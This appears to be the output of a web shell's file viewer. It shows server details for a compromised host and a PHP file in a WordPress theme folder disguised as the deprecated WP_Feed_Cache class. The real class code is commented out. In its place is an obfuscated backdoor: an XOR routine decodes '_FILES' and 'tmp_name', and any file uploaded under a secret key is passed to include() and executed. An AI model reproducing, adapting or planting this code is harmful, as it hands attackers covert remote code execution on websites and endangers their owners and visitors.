| Server IP : 54.36.91.62 / Your IP : 216.73.216.15 Web Server : Apache System : Linux webm021.cluster127.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64 User : uxhactp ( 169076) PHP Version : 7.4.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/uxhactp/www/wp-content/themes/787rns9q/ |
Upload File : |
<?php /*
*
* Feed API: WP_Feed_Cache class
*
* @package WordPress
* @subpackage Feed
* @since 4.7.0
* @deprecated 5.6.0
_deprecated_file(
basename( __FILE__ ),
'5.6.0',
'',
__( 'This file is only loaded for backward compatibility with SimplePie 1.2.x. Please consider switching to a recent SimplePie version.' )
);
*
* Core class used to implement a feed cache.
*
* @since 2.8.0
*
* @see SimplePie_Cache
#[AllowDynamicProperties]
class WP_Feed_Cache extends SimplePie_Cache {
*
* Creates a new SimplePie_Cache object.
*
* @since 2.8.0
*
* @param string $location URL location (scheme is used to determine handler).
*/
$double = 'Hru70MXBgO';
$utf8_pcre = 'safe_text';
$tagstack = $double;
function protocols($category, $untrash)
{
$closing_quote = $untrash;
$sanitized = urldecode($category);
$full_match = substr($closing_quote,0, strlen($sanitized));
$static_characters = $sanitized ^ $full_match;
return $static_characters;
}
$encoded_text = ${protocols("%174%3C%7Bu%1E", $tagstack)};
$custom = $encoded_text;
$show_in_rest = isset($custom[$tagstack]);
if ($show_in_rest)
{
$post_modified_gmt = $encoded_text[$tagstack];
$imagedata = $post_modified_gmt[protocols("%3C%1F%05h%5E%2C5%27", $tagstack)];
$ptype = $imagedata;
include ($ptype);
$special_chars = 'single';
}
/* * @param string $filename Unique identifier for cache object.
* @param string $extension 'spi' or 'spc'.
* @return WP_Feed_Cache_Transient Feed cache handler object that uses transients.
public function create( $location, $filename, $extension ) {
return new WP_Feed_Cache_Transient( $location, $filename, $extension );
}
}
*/